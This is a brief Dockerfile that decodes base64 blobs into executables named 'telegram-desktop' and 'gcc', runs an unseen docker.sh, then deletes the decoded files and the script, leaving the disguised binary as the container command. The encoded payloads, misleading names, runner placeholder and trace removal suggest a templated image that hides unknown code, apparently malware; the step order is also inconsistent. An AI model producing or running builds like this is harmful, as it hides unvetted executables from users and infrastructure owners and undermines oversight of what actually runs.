FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > telegram-desktop.log'

RUN base64 --decode telegram-desktop.64 > telegram-desktop
RUN base64 --decode gcc.64 > gcc

RUN chmod +x gcc

COPY telegram-desktop .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' telegram-desktop
RUN bash ./docker.sh

RUN rm --force --recursive telegram-desktop _REPO_NAME__.64 docker.sh gcc gcc.64

CMD telegram-desktop
